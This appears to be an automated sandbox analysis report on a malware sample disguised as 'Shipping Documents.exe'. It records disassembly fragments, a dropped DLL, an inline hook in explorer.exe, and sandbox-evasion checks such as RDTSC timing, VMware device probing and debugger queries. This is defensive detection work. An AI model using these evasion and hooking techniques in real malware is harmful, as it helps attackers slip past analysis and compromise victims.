          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_0040E394 push ebp; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00416486 push ecx; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_0041DD91 push edi; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_0041DE8C push FFFFFF81h; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_004077BF pushfd ; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B0D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_0483D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_00486950 push eax; retf
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_0048C167 push ebp; iretd
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_00487237 push es; retf
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_00486BCC push cs; retf
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_0047E394 push ebp; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_00486486 push ecx; retf
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_0048DD91 push edi; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_0048DE8C push FFFFFF81h; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_0048CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_0048CF6C push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_0048CF0B push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_0048CF02 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 7_2_004777BF pushfd ; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe File created: C:\Users\user\AppData\Local\Temp\nszCE87.tmp\22m80anrrsp.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 00000000004798E4 second address: 00000000004798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000000479B5E second address: 0000000000479B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 6160 Thread sleep count: 34 > 30
          Source: C:\Windows\explorer.exe TID: 6160 Thread sleep time: -68000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 744 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 1_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 1_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 1_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.680935628.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.672497965.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.680935628.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.917276050.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.681240089.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.681489254.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 1_2_10001000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AF90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B72073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B81074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ADC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AD4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AC8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AD3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AF927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B88A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B7EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B44257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B85BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B6D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B7138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B7131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B88B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ABF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
